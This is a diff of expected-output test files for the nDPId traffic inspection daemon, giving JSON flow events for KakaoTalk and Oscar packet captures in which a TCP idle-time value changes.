+00654{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069161865,"flow_last_seen":1430069161865,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"216.58.220.161","dst_ip":"10.24.82.188","src_port":443,"dst_port":56697,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} +00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069161865,"flow_last_seen":1430069161865,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"216.58.220.161","dst_ip":"10.24.82.188","src_port":443,"dst_port":56697,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 
+00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069210863,"flow_last_seen":1430069210863,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"173.194.117.229","dst_ip":"10.24.82.188","src_port":443,"dst_port":38380,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} +00590{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069210863,"flow_last_seen":1430069210863,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"173.194.117.229","dst_ip":"10.24.82.188","src_port":443,"dst_port":38380,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":1488,"flow_first_seen":1430069171389,"flow_last_seen":1430069216410,"flow_idle_time":180000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":192,"flow_tot_l4_payload_len":133038,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"1.201.1.174","src_port":10268,"dst_port":23046,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}} 
00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1430069170975,"flow_last_seen":1430069216076,"flow_idle_time":180000,"flow_min_l4_payload_len":78,"flow_max_l4_payload_len":106,"flow_tot_l4_payload_len":2144,"flow_avg_l4_payload_len":97,"midstream":0,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"1.201.1.174","src_port":10269,"dst_port":23047,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"KakaoTalk_Voice","breed":"Acceptable","category":"VoIP"}} -00820{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1430069159456,"flow_last_seen":1430069163250,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":609,"flow_tot_l4_payload_len":815,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"203.205.147.215","src_port":48489,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"4": {"risk":"Binary Application Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"HTTP.QQ","breed":"Fun","category":"Download"}} 
-00659{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1430069141261,"flow_last_seen":1430069141741,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"120.28.26.242","dst_ip":"10.24.82.188","src_port":80,"dst_port":34533,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1430069141261,"flow_last_seen":1430069141741,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"120.28.26.242","dst_ip":"10.24.82.188","src_port":80,"dst_port":34533,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -01177{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":45,"flow_first_seen":1430069163715,"flow_last_seen":1430069216555,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":852,"flow_tot_l4_payload_len":7008,"flow_avg_l4_payload_len":155,"midstream":0,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"110.76.143.50","src_port":32968,"dst_port":8080,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": 
{"total":260,"client":230,"server":30}},"6": {"risk":"Self-signed Certificate","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.KakaoTalk","breed":"Acceptable","category":"Chat"}} -00659{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069180329,"flow_last_seen":1430069180329,"flow_idle_time":7440000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"216.58.220.174","src_port":49217,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} -00594{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069180329,"flow_last_seen":1430069180329,"flow_idle_time":7440000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"216.58.220.174","src_port":49217,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 
-00663{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1430069140120,"flow_last_seen":1430069164894,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":436,"flow_tot_l4_payload_len":740,"flow_avg_l4_payload_len":67,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"103.246.57.251","src_port":51021,"dst_port":8080,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP_Proxy","breed":"Acceptable","category":"Web"}} -00596{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1430069140120,"flow_last_seen":1430069164894,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":436,"flow_tot_l4_payload_len":740,"flow_avg_l4_payload_len":67,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"103.246.57.251","src_port":51021,"dst_port":8080,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -01177{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":40,"flow_first_seen":1430069164966,"flow_last_seen":1430069216555,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":852,"flow_tot_l4_payload_len":7778,"flow_avg_l4_payload_len":194,"midstream":0,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"110.76.143.50","src_port":58857,"dst_port":9001,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": 
{"total":260,"client":230,"server":30}},"6": {"risk":"Self-signed Certificate","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.KakaoTalk","breed":"Acceptable","category":"Chat"}} -00659{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069170090,"flow_last_seen":1430069170090,"flow_idle_time":7440000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":96,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.194.72.188","src_port":34686,"dst_port":5228,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} -00594{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069170090,"flow_last_seen":1430069170090,"flow_idle_time":7440000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":96,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.194.72.188","src_port":34686,"dst_port":5228,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 
+00820{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1430069159456,"flow_last_seen":1430069163250,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":609,"flow_tot_l4_payload_len":815,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"203.205.147.215","src_port":48489,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"4": {"risk":"Binary Application Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"HTTP.QQ","breed":"Fun","category":"Download"}} +00659{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1430069141261,"flow_last_seen":1430069141741,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"120.28.26.242","dst_ip":"10.24.82.188","src_port":80,"dst_port":34533,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1430069141261,"flow_last_seen":1430069141741,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"120.28.26.242","dst_ip":"10.24.82.188","src_port":80,"dst_port":34533,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +01177{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":45,"flow_first_seen":1430069163715,"flow_last_seen":1430069216555,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":852,"flow_tot_l4_payload_len":7008,"flow_avg_l4_payload_len":155,"midstream":0,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"110.76.143.50","src_port":32968,"dst_port":8080,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"6": {"risk":"Self-signed Certificate","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.KakaoTalk","breed":"Acceptable","category":"Chat"}} 
+00659{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069180329,"flow_last_seen":1430069180329,"flow_idle_time":7560000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"216.58.220.174","src_port":49217,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} +00594{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069180329,"flow_last_seen":1430069180329,"flow_idle_time":7560000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"216.58.220.174","src_port":49217,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00663{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1430069140120,"flow_last_seen":1430069164894,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":436,"flow_tot_l4_payload_len":740,"flow_avg_l4_payload_len":67,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"103.246.57.251","src_port":51021,"dst_port":8080,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP_Proxy","breed":"Acceptable","category":"Web"}} 
+00596{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1430069140120,"flow_last_seen":1430069164894,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":436,"flow_tot_l4_payload_len":740,"flow_avg_l4_payload_len":67,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"103.246.57.251","src_port":51021,"dst_port":8080,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +01177{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":40,"flow_first_seen":1430069164966,"flow_last_seen":1430069216555,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":852,"flow_tot_l4_payload_len":7778,"flow_avg_l4_payload_len":194,"midstream":0,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"110.76.143.50","src_port":58857,"dst_port":9001,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"6": {"risk":"Self-signed Certificate","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.KakaoTalk","breed":"Acceptable","category":"Chat"}} 
+00659{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069170090,"flow_last_seen":1430069170090,"flow_idle_time":7560000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":96,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.194.72.188","src_port":34686,"dst_port":5228,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} +00594{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069170090,"flow_last_seen":1430069170090,"flow_idle_time":7560000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":96,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.194.72.188","src_port":34686,"dst_port":5228,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069211640,"flow_last_seen":1430069211843,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":74,"flow_tot_l4_payload_len":109,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":25223,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Facebook","breed":"Fun","category":"SocialNetwork"}} 
00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":1503,"flow_first_seen":1430069171118,"flow_last_seen":1430069216536,"flow_idle_time":180000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":192,"flow_tot_l4_payload_len":134109,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"1.201.1.174","src_port":11320,"dst_port":23044,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}} 00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1430069170892,"flow_last_seen":1430069214736,"flow_idle_time":180000,"flow_min_l4_payload_len":78,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":2116,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"1.201.1.174","src_port":11321,"dst_port":23045,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"KakaoTalk_Voice","breed":"Acceptable","category":"VoIP"}} -00648{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1430069164656,"flow_last_seen":1430069216559,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":442,"flow_tot_l4_payload_len":918,"flow_avg_l4_payload_len":183,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"139.150.0.125","dst_ip":"10.24.82.188","src_port":443,"dst_port":46947,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match 
by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00594{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1430069164656,"flow_last_seen":1430069216559,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":442,"flow_tot_l4_payload_len":918,"flow_avg_l4_payload_len":183,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"139.150.0.125","dst_ip":"10.24.82.188","src_port":443,"dst_port":46947,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00648{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1430069164656,"flow_last_seen":1430069216559,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":442,"flow_tot_l4_payload_len":918,"flow_avg_l4_payload_len":183,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"139.150.0.125","dst_ip":"10.24.82.188","src_port":443,"dst_port":46947,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00594{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1430069164656,"flow_last_seen":1430069216559,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":442,"flow_tot_l4_payload_len":918,"flow_avg_l4_payload_len":183,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"139.150.0.125","dst_ip":"10.24.82.188","src_port":443,"dst_port":46947,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 
00572{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","packets-captured":3203,"packets-processed":3203,"total-skipped-flows":0,"total-l4-data-len":291404,"total-not-detected-flows":0,"total-guessed-flows":11,"total-detected-flows":9,"total-detection-updates":5,"total-updates":0,"current-active-flows":0,"total-active-flows":20,"total-idle-flows":20,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":116,"global_ts_msec":1430069216559} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 3203/3203 diff --git a/test/results/Oscar.pcap.out b/test/results/Oscar.pcap.out index e04bd97d6..a21049864 100644 --- a/test/results/Oscar.pcap.out +++ b/test/results/Oscar.pcap.out 
@@ -1,12 +1,12 @@ 00456{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"Oscar.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00542{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"Oscar.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1434606464176} -00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"Oscar.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1434606464176,"flow_last_seen":1434606464176,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1434606464176,"l3_proto":"ip4","src_ip":"10.30.29.3","dst_ip":"178.237.24.249","src_port":63357,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"Oscar.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1434606464176,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1434606464176,"pkt":"AAxCW5ILDE3pmjdICABFAABAZ9pAAEAGAAAKHh0Dsu0Y+fd9Abu9oGylAAAAALAC\/\/\/zOQAAAgQFtAEDAwUBAQgKFdAS4wAAAAAEAgAA"} 